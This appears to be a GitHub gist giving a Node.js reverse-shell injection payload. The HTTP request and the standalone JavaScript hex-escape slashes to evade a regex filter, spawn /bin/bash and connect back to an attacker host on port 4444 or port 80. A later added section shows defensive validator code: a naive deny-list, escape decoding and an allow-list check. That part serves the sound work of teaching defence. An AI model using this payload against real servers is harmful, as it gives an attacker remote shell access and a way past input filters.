@enderphan94
Last active September 12, 2020 08:06
Reverse Shell in nodejs #nodejs #shell

JavaScript string literals can, by design, contain hex-escaped characters (along with other escape forms). So the forward slashes can be hex-encoded to get past a regex that filters them: the slashes in the cmd string are written as `\x2f` escapes instead of literal `/` characters, for example:

```
\\x2fbin\\x2fbash
```

e.g.:

```http
POST /users HTTP/1.1
Host: 172.118.132.4
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
Content-Length: 482

{
  "requests": [
    {
      "method": "get",
      "path": "/age"
    },
    {
      "method": "get",
      "path": "/balance"
    },
    {
      "method": "get",
      "path": "/card/$id;var net = require(\"net\"), sh = require(\"child_process\").exec(\"\\x2fbin\\x2fbash\");  var client = new net.Socket(); client.connect(4444, \"192.168.0.103\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});"
    }
  ]
}
```
The injected JavaScript on its own:

```javascript
// Spawn a shell; the path is written with hex-escaped slashes (see above)
var net = require("net"), sh = require("child_process").exec("\\x2fbin\\x2fbash");
var client = new net.Socket();
// Connect back to the remote host and wire the shell's stdin/stdout/stderr to the socket
client.connect(80, "attackerip", function(){
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
});
```
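From the defender's side, the gist shows why a deny-list regex applied to the raw request value is not enough: the `\x2f` escapes only become `/` when the string is later interpreted as JavaScript source. The following is an added example (not part of the gist) that puts the naive check next to a check that decodes JS escape sequences before applying the rule, and next to an allow-list check on the expected shape of the value. The function names and the sample inputs are constructed for this illustration; the one that matters is the JSON-decoded form of the gist's own string.

```javascript
// Added example, not from the gist. Shows how a deny-list regex on the raw
// value misses hex-escaped slashes, and two ways a validator can close that gap.

// Weak check: rejects only a literal "/" in the raw request value.
// Returns true when the value would be allowed.
function naiveCheck(value) {
  return !/\//.test(value);
}

// Resolve the escape forms a JS string literal would decode at parse time:
// \xNN, \uNNNN and \u{...}. Anything else is left untouched.
function decodeJsEscapes(value) {
  return value.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]{1,6}\}|u[0-9a-fA-F]{4})/g,
    (match, esc) => {
      const hex = esc[0] === 'x' ? esc.slice(1) : esc.replace(/^u\{?|\}$/g, '');
      return String.fromCodePoint(parseInt(hex, 16));
    }
  );
}

// Hardened deny-list check: normalize first, then apply the same rule.
function hardenedCheck(value) {
  return !/\//.test(decodeJsEscapes(value));
}

// Preferred: allow-list the expected shape (here a numeric id) rather than
// hunting for bad characters. A value that is only ever interpolated after
// this check cannot smuggle in code at all.
function allowListCheck(value) {
  return /^[0-9]+$/.test(value);
}

// Constructed sample values as they look after JSON decoding of the request body.
const samples = [
  '42',                     // legitimate id
  '/etc/passwd',            // literal slash: every check rejects it
  '\\x2fbin\\x2fbash',      // the gist's hex-escaped form: naive check lets it through
  '\\u002fbin\\u002fbash',  // same idea with \u escapes
];

function evaluate(value) {
  return {
    value,
    decoded: decodeJsEscapes(value),
    naiveAllows: naiveCheck(value),
    hardenedAllows: hardenedCheck(value),
    allowListAllows: allowListCheck(value),
  };
}

for (const s of samples) {
  console.log(evaluate(s));
}
```

The decisive row is the third one: the naive check reports the hex-escaped value as clean, the normalized check rejects it, and the allow-list check rejects it without needing to know about escape syntax at all. The escape-decoding step is a mitigation for code that must keep a deny-list; the root cause in the gist's scenario is that the request value ends up interpreted as JavaScript, and the durable fix is to stop that interpolation entirely.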